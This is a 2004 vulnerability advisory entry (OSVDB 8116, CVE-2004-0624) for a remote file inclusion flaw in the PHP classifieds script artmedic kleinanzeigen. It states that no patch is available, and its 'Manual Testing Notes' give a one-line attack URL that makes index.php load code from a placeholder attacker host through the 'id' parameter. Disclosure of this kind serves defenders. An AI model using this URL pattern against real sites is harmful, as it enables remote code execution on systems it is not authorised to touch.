artmedic kleinanzeigen Arbitrary Code Execution

2004-07-18T03:08:28
ID OSVDB:8116
Type osvdb
Reporter Francisco Alisson(dominusvis@click21.com.br)
Modified 2004-07-18T03:08:28

Description

Vulnerability Description

artmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victims system, resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

artmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victims system, resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/artmedic-kleinanzeigen-path/index.php?id=http://[attacker]

References:

Vendor URL: http://www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php Security Tracker: 1010740 Secunia Advisory ID:12099 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0229.html Keyword: Remote File Inclusion ISS X-Force ID: 16518 ISS X-Force ID: 16741 CVE-2004-0624